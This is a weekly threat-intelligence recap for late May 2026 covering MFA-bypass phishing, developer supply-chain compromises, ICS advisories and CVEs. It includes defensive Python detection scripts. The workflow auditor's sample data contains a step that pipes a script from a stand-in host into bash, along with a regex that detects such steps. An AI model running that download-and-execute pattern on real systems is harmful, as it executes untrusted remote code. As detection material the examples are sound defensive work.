Weekly Recap — 2026-05-25 -> 2026-06-01
Session Hijacking and Developer Tool Poisoning Collapse Authentication Trust

This week, attackers proved that multi-factor authentication is no longer a reliable gatekeeper. Campaigns like Tycoon 2FA and Chinese-language PhaaS platforms intercept one-time passwords in real time and steal session tokens to maintain persistent access, while infostealers like EKZ Infostealer harvest browser cookies to bypass authentication entirely. Even when victims reset passwords and revoke sessions, attackers retain access through hidden device registrations — meaning standard incident response playbooks are now incomplete.

Developers remain the preferred entry point for supply chain compromise. The Glassworm botnet was disrupted after hiding malware in VSCode extensions and npm packages, while the Megalodon campaign poisoned GitHub Actions workflows across 5,500 repositories. A malicious Sicoob.Sdk NuGet package stole banking certificates from Brazilian developers, and North Korea's Lazarus group compromised the widely used axios npm library — a single attack touching millions of downstream applications.

Organizations must move beyond password-and-MFA reliance: adopt hardware security keys, shorten session lifetimes, delete attacker-registered devices before resetting credentials, and audit developer toolchains and CI/CD pipelines for tampering.
By the Numbers
- Total articles: 34
- By severity: Critical: 12, High: 17, Informational: 1, Low: 1, Medium: 3
- By category: APT: 2, general security news: 4, malware: 7, phishing/social engineering: 3, vulnerability: 18
Top Threats
Session Hijacking and MFA Bypass at Scale
Adversary-in-the-middle phishing kits and infostealers are rendering traditional MFA ineffective by stealing authenticated session tokens rather than breaking cryptography. Tycoon 2FA proxies login flows to harvest session cookies and register persistent device tokens that survive password resets, while Chinese PhaaS platforms use AI-driven site cloning and real-time OTP interception to drain bank accounts within seconds of credential entry.
- https://www.elastic.co/security-labs/tycoon-2fa-aitm-detection-engineering
- https://cloud.google.com/blog/topics/threat-intelligence/chinese-language-phishing-services/
- https://arcticwolf.com/resources/blog/forticlient-ems-exploited-via-cve-2026-35616-to-deliver-ekz-infostealer-disguised-as-a-fortinet-patch/
- https://www.huntress.com/blog/why-hackers-don't-need-passwords-anymore
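The session-theft pattern described above (a stolen token replayed from a second address, then a device registered under it so access outlives a password reset) can be hunted in identity logs. The script below is an added example, not code from any of the linked reports; the event field names and the sample events are constructed, and the 15-minute window is an assumption to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed identity-provider events for two users (sample data, not from any real tenant).
# Field names are assumptions; map them to your IdP's sign-in and audit log schema.
EVENTS = [
    {"ts": "2026-05-27T09:01:10", "type": "signin", "user": "a.lee", "ip": "203.0.113.7", "session": "S1"},
    {"ts": "2026-05-27T09:01:25", "type": "token_use", "user": "a.lee", "ip": "203.0.113.7", "session": "S1"},
    # Same session token replayed from a second address two minutes later: AitM proxy pattern.
    {"ts": "2026-05-27T09:03:02", "type": "token_use", "user": "a.lee", "ip": "198.51.100.42", "session": "S1"},
    # Device registered under the stolen session so access survives a password reset.
    {"ts": "2026-05-27T09:04:40", "type": "device_register", "user": "a.lee", "ip": "198.51.100.42",
     "session": "S1", "device": "DESKTOP-9Q2"},
    # Benign user: one address throughout, registers a device from the same session and IP.
    {"ts": "2026-05-27T10:10:00", "type": "signin", "user": "b.ng", "ip": "192.0.2.15", "session": "S2"},
    {"ts": "2026-05-27T10:12:00", "type": "device_register", "user": "b.ng", "ip": "192.0.2.15",
     "session": "S2", "device": "LAPTOP-B"},
]

WINDOW = timedelta(minutes=15)  # assumed replay window; tune to your sign-in telemetry


def hijacked_sessions(events, window=WINDOW):
    """Session ids whose token was used from two different IPs within `window`.
    Token reuse across addresses shortly after sign-in is the AitM cookie-theft signature;
    ASN/geo enrichment (not done here) would suppress benign mobile-network IP changes."""
    uses = defaultdict(list)
    for e in events:
        uses[e["session"]].append((datetime.fromisoformat(e["ts"]), e["ip"]))
    flagged = set()
    for sid, seq in uses.items():
        seq.sort()
        for i, (t1, ip1) in enumerate(seq):
            if any(ip2 != ip1 and t2 - t1 <= window for t2, ip2 in seq[i + 1:]):
                flagged.add(sid)
    return sorted(flagged)


def response_plan(events, window=WINDOW):
    """Per affected user: hijacked sessions plus devices registered under them. The devices
    must be deleted before the password reset and session revocation, or access persists."""
    bad = set(hijacked_sessions(events, window))
    plan = defaultdict(lambda: {"sessions": set(), "devices_to_remove": set()})
    for e in events:
        if e["session"] in bad:
            plan[e["user"]]["sessions"].add(e["session"])
            if e["type"] == "device_register":
                plan[e["user"]]["devices_to_remove"].add(e["device"])
    return {u: {k: sorted(v) for k, v in d.items()} for u, d in plan.items()}
```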
Developer Supply Chain Compromise
Threat actors are embedding malicious code in packages, extensions, and CI/CD workflows at an accelerating pace, exploiting the implicit trust developers place in their tooling. Glassworm and Megalodon both weaponized developer environments through trojanized VSCode extensions and poisoned GitHub Actions, while a fraudulent NuGet package exfiltrated banking certificates and Lazarus compromised the axios library with 100M+ weekly downloads — proving that a single supply chain intrusion now cascades across millions of downstream applications.
- https://www.crowdstrike.com/en-us/blog/inside-crowdstrike-takedown-of-a-developer-targeting-botnet/
- https://www.reversinglabs.com/blog/hunting-megalodon-fossils
- https://socket.dev/blog/malicious-nuget-package-impersonates-sicoob-sdk
- https://www.welivesecurity.com/en/eset-research/eset-apt-activity-report-q4-2025-q1-2026/
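One concrete form of the CI/CD audit recommended above is a workflow scan for the two footholds a poisoned pipeline typically relies on: third-party actions referenced by a mutable tag instead of a commit SHA, and steps that pipe a downloaded script into a shell. This is an added example, not code from any of the linked reports, and the page does not state that Megalodon used either technique; the sample workflow and its SHA are constructed.

```python
import re

# Constructed sample workflow (not from any real repository). The 40-hex SHA is a placeholder.
SAMPLE_WORKFLOW = """\
name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567
      - uses: some-org/setup-tool@v2
      - name: install helper
        run: curl -sSL https://example.invalid/install.sh | bash
      - run: npm ci && npm test
"""

SHA_PIN = re.compile(r"^[0-9a-f]{40}$")
USES = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)")
RUN = re.compile(r"^\s*-?\s*run:\s*(.+)$")
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba)?sh\b")


def audit_workflow(text):
    """Return (line_no, finding) pairs for action refs that are not commit-SHA pinned and for
    run steps that pipe downloaded content into a shell. Local actions (./path) and docker://
    refs are skipped; image digests need a separate check. Single-line `run:` only; block
    scalars (run: |) would need a small YAML-aware pass."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = USES.match(line)
        if m:
            ref = m.group(1)
            if ref.startswith("./") or ref.startswith("docker://"):
                continue
            action, _, version = ref.partition("@")
            if not SHA_PIN.match(version):
                findings.append((n, f"unpinned action {action}@{version or '<none>'}"))
            continue
        m = RUN.match(line)
        if m and PIPE_TO_SHELL.search(m.group(1)):
            findings.append((n, "remote script piped to shell"))
    return findings
```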
Critical Infrastructure Vulnerabilities with Hard-Coded Credentials
A flood of critical-severity ICS advisories this week exposed hard-coded passwords and unauthenticated remote code execution flaws across industrial and medical systems. The PUSR USR-W610 converter and Eppendorf BioFlo bioreactor both ship with unchangeable default credentials granting full administrative control, while ABB's B&R Automation Runtime carries a CVSS 10.0 denial-of-service flaw — risks compounded by vendors who are unresponsive to coordination attempts.
- https://www.cisa.gov/news-events/ics-advisories/icsa-26-146-04
- https://www.cisa.gov/news-events/ics-advisories/icsa-26-148-02
- https://www.cisa.gov/news-events/ics-medical-advisories/icsma-26-146-01
- https://www.cisa.gov/news-events/ics-advisories/icsa-26-146-05
- https://www.cisa.gov/news-events/ics-advisories/icsa-26-146-06
- https://www.cisa.gov/news-events/ics-advisories/icsa-26-146-01
- https://www.cisa.gov/news-events/ics-advisories/icsa-26-148-03
- https://www.cisa.gov/news-events/ics-advisories/icsa-26-148-07
- https://blog.talosintelligence.com/dicom-pydicom-gdcm-and-orthanc-a-technical-tour-of-what-really-happens-in-the-heap/
AI-Augmented Attack Operations
Generative AI has moved from experimental use to operational deployment across both criminal and state-sponsored campaigns. Russia-aligned GREYVIBE systematically uses LLMs to author malware and fabricate convincing phishing lures, while commercial PhaaS platforms integrate multi-stage AI pipelines for automated site cloning and business email compromise drafting — and AI is compressing the patch window by generating working exploits from advisories within hours of disclosure.
- https://labs.withsecure.com/publications/greyvibe.html
- https://cloud.google.com/blog/topics/threat-intelligence/chinese-language-phishing-services/
- https://research.checkpoint.com/2026/ai-threat-landscape-digest-march-april-2026/
Takedown-Resistant Command and Control Infrastructure
Attackers are engineering C2 channels that resist disruption by leveraging immutable blockchain contracts, decentralized protocols, and legitimate cloud services. ClearFake stores payload routing on BNB Smart Chain testnet smart contracts, Glassworm used Solana blockchain memos alongside BitTorrent DHT and Google Calendar events, and piracy-themed malware employs DNS tunneling with domain generation algorithms — rendering traditional domain-blocking defenses increasingly ineffective.
- https://www.trendmicro.com/en_us/research/26/e/smart-contracts-for-command-and-control.html
- https://www.crowdstrike.com/en-us/blog/inside-crowdstrike-takedown-of-a-developer-targeting-botnet/
- https://securelist.com/video-books-pirates-miners-rat/119943/
Trending CVEs
- CVE-2026-35616 (1 mention) — FortiClient EMS vulnerability actively exploited in the wild to deliver EKZ Infostealer disguised as a Fortinet patch via trusted management channels. Sources: 1
- CVE-2026-0257 (1 mention) — Palo Alto Networks PAN-OS authentication bypass added to the CISA KEV catalog due to active exploitation in the wild. Sources: 1
- CVE-2026-5426 (1 mention) — Critical ViewState deserialization RCE in KnowledgeDeliver LMS using hard-coded ASP.NET machine keys, enabling BLUEBEAM web shell deployment and Cobalt Strike BEACON delivery. Sources: 1
- CVE-2025-3450 (1 mention) — CVSS 10.0 improper resource locking vulnerability in ABB B&R Automation Runtime SDM allowing unauthenticated remote attackers to cause complete denial of service. Sources: 1
- CVE-2026-7786 (1 mention) — Critical hard-coded plaintext administrative credentials in PUSR USR-W610 converter firmware with no available patch; vendor unresponsive to CISA coordination. Sources: 1
- CVE-2026-7251 (1 mention) — Critical hard-coded VNC password in Eppendorf BioFlo 320 bioreactors allowing unauthenticated remote control of medical/research equipment. Sources: 1
- CVE-2026-45659 (1 mention) — Critical Microsoft SharePoint remote code execution vulnerability requiring an out-of-band patch; GitHub Enterprise Server customers must also rotate public keys. Sources: 1
- CVE-2026-41940 (1 mention) — cPanel CRLF injection vulnerability exploited in the Megalodon campaign to gain root access and deploy XMR cryptominers via Docker. Sources: 1
Sector Trends
- Critical Infrastructure and OT — Industrial control systems face compounding risk from hard-coded credentials and unpatchable devices. ABB alone issued advisories across five product lines, the PUSR USR-W610 ships with plaintext admin passwords and no available patch, and the Eppendorf BioFlo bioreactor contains an unchangeable VNC password — while nation-state actors like Sandworm and CyberAv3ngers actively target energy and water infrastructure in NATO states. Sources: 1, 2, 3, 4, 5
- Financial Services — Chinese-language PhaaS platforms are heavily targeting Japanese consumers with real-time OTP interception and digital wallet provisioning, while a malicious NuGet package exfiltrated Brazilian banking certificates and payment data from developers — indicating that financial sector attacks increasingly originate through compromised developer tooling rather than direct network intrusion. Sources: 1, 2
- Sports and Mega Events — The 2026 World Cup's distributed multi-city infrastructure creates a vast attack surface facing Iran-aligned OT attackers targeting exposed PLCs, Russia-aligned hacktivists launching DDoS campaigns, and financially motivated ransomware operators targeting hospitality and ticketing systems. Sources: 1
Notable Incidents
- CrowdStrike disrupts Glassworm developer-targeting botnet — Joint takedown with Google and Shadowserver severed four resilient C2 channels using Solana blockchain memos, BitTorrent DHT, Google Calendar, and direct VPS connections; infected machines now beacon to sinkhole IP 164.92.88.210 as a high-fidelity IOC
- FortiClient EMS exploited to deliver EKZ Infostealer disguised as Fortinet patch — Attackers weaponized trusted endpoint management channels to push malware disguised as a legitimate Fortinet update, and the stealer bypasses Chromium's AES-256 master key encryption
- Lazarus compromises axios npm library with 100M+ weekly downloads — North Korean actors stole maintainer credentials to inject trojanized code into one of the most widely used JavaScript libraries, demonstrating the catastrophic blast radius of single-package supply chain attacks
- The Gentlemen ransomware emerges with aggressive self-propagation — Go-based Ransomware-as-a-Service operated by Storm-2697 combines Curve25519/XChaCha20 hybrid encryption with redundant lateral movement via PsExec, WMI, scheduled tasks, services, and PowerShell remoting
- CISA adds PAN-OS authentication bypass to KEV catalog — Active exploitation of a Palo Alto Networks PAN-OS authentication bypass forces mandatory remediation for federal agencies and signals urgent risk for any organization with exposed firewall management interfaces